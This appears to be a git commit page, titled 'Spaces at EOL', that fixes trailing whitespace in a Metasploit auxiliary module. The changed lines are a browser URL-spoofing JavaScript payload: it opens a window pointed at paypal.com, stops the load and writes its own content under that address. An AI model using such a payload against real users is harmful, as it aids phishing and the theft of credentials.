Spaces at EOL
parent
6e8412fa73
commit
f1d29e730f
|
@ -43,11 +43,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
def setup
|
||||
@html = <<-JS
|
||||
<script type="text/javascript">
|
||||
win = window.open("sleep_one_second.php", "WIN");
|
||||
window.open("https://www.paypal.com", "WIN");
|
||||
win.document.execCommand('Stop');
|
||||
win.document.write("Spoofed URL");
|
||||
win.document.close();
|
||||
win = window.open("sleep_one_second.php", "WIN");
|
||||
window.open("https://www.paypal.com", "WIN");
|
||||
win.document.execCommand('Stop');
|
||||
win.document.write("Spoofed URL");
|
||||
win.document.close();
|
||||
</script>
|
||||
JS
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue